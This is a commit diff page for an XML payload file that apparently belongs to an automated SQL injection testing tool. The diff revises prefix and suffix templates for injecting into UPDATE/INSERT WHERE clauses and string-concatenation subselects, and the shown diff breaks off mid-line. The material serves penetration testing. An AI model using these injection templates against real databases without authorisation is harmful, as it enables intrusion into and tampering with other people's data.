You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: xml/payloads.xml
+37-19Lines changed: 37 additions & 19 deletions
Original file line number
Diff line number
Diff line change
@@ -451,21 +451,30 @@ Formats:
451
451
452
452
<!-- Pre-WHERE generic boundaries (e.g. "UPDATE table SET '$_REQUEST["name"]' WHERE id=1" or "INSERT INTO table VALUES('$_REQUEST["value"]') WHERE id=1)"-->
453
453
<boundary>
454
-
<level>4</level>
454
+
<level>5</level>
455
455
<clause>1</clause>
456
456
<where>1,2</where>
457
-
<ptype>1</ptype>
458
-
<prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix>
459
-
<suffix></suffix>
457
+
<ptype>2</ptype>
458
+
<prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix>
459
+
<suffix>-- AND ('[RANDSTR]'='[RANDSTR]</suffix>
460
460
</boundary>
461
461
462
462
<boundary>
463
463
<level>5</level>
464
464
<clause>1</clause>
465
465
<where>1,2</where>
466
466
<ptype>2</ptype>
467
-
<prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix>
468
-
<suffix></suffix>
467
+
<prefix>") WHERE [RANDNUM]=[RANDNUM]</prefix>
468
+
<suffix>-- AND ("[RANDSTR]"="[RANDSTR]</suffix>
469
+
</boundary>
470
+
471
+
<boundary>
472
+
<level>4</level>
473
+
<clause>1</clause>
474
+
<where>1,2</where>
475
+
<ptype>1</ptype>
476
+
<prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix>
477
+
<suffix>-- AND ([RANDNUM1]=[RANDNUM1]</suffix>
469
478
</boundary>
470
479
471
480
<boundary>
@@ -474,7 +483,7 @@ Formats:
474
483
<where>1,2</where>
475
484
<ptype>2</ptype>
476
485
<prefix>' WHERE [RANDNUM]=[RANDNUM]</prefix>
477
-
<suffix></suffix>
486
+
<suffix>-- AND '[RANDSTR]'='[RANDSTR]</suffix>
478
487
</boundary>
479
488
480
489
<boundary>
@@ -483,7 +492,16 @@ Formats:
483
492
<where>1,2</where>
484
493
<ptype>4</ptype>
485
494
<prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix>
486
-
<suffix></suffix>
495
+
<suffix>-- AND "[RANDSTR]"="[RANDSTR]</suffix>
496
+
</boundary>
497
+
498
+
<boundary>
499
+
<level>4</level>
500
+
<clause>1</clause>
501
+
<where>1,2</where>
502
+
<ptype>1</ptype>
503
+
<prefix> WHERE [RANDNUM]=[RANDNUM]</prefix>
504
+
<suffix>-- AND [RANDNUM1]=[RANDNUM1]</suffix>
487
505
</boundary>
488
506
<!-- End of pre-WHERE generic boundaries -->
489
507
@@ -493,43 +511,43 @@ Formats:
493
511
<clause>1</clause>
494
512
<where>1</where>
495
513
<ptype>2</ptype>
496
-
<prefix> || (SELECT [RANDNUM1] FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
497
-
<suffix>)||</suffix>
514
+
<prefix>||(SELECT [RANDNUM1] FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
515
+
<suffix>)||</suffix>
498
516
</boundary>
499
517
500
518
<boundary>
501
519
<level>5</level>
502
520
<clause>1</clause>
503
521
<where>1</where>
504
522
<ptype>2</ptype>
505
-
<prefix>||(SELECT [RANDNUM1] WHERE [RANDNUM]=[RANDNUM]</prefix>
506
-
<suffix>)||</suffix>
523
+
<prefix>||(SELECT [RANDNUM1] WHERE [RANDNUM]=[RANDNUM]</prefix>
524
+
<suffix>)||</suffix>
507
525
</boundary>
508
526
509
527
<boundary>
510
528
<level>5</level>
511
529
<clause>1</clause>
512
530
<where>1</where>
513
531
<ptype>2</ptype>
514
-
<prefix>' || (SELECT [RANDNUM1] FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
515
-
<suffix>) || '</suffix>
532
+
<prefix>'||(SELECT [RANDNUM1] FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
533
+
<suffix>)||'</suffix>
516
534
</boundary>
517
535
518
536
<boundary>
519
537
<level>5</level>
520
538
<clause>1</clause>
521
539
<where>1</where>
522
540
<ptype>2</ptype>
523
-
<prefix>' || (SELECT [RANDNUM1] WHERE [RANDNUM]=[RANDNUM]</prefix>
524
-
<suffix>) || '</suffix>
541
+
<prefix>'||(SELECT [RANDNUM1] WHERE [RANDNUM]=[RANDNUM]</prefix>
542
+
<suffix>)||'</suffix>
525
543
</boundary>
526
544
527
545
<boundary>
528
546
<level>5</level>
529
547
<clause>1</clause>
530
548
<where>1</where>
531
549
<ptype>1</ptype>
532
-
<prefix> + (SELECT [RANDNUM1] WHERE [RANDNUM]=[RANDNUM]</prefix>
550
+
<prefix>+(SELECT [RANDNUM1] WHERE [RANDNUM]=[RANDNUM]</prefix>
533
551
<suffix>)</suffix>
534
552
</boundary>
535
553
@@ -538,8 +556,8 @@ Formats:
538
556
<clause>1</clause>
539
557
<where>1</where>
540
558
<ptype>2</ptype>
541
-
<prefix>' + (SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
542
-
<suffix>) + '</suffix>
559
+
<prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
0 commit comments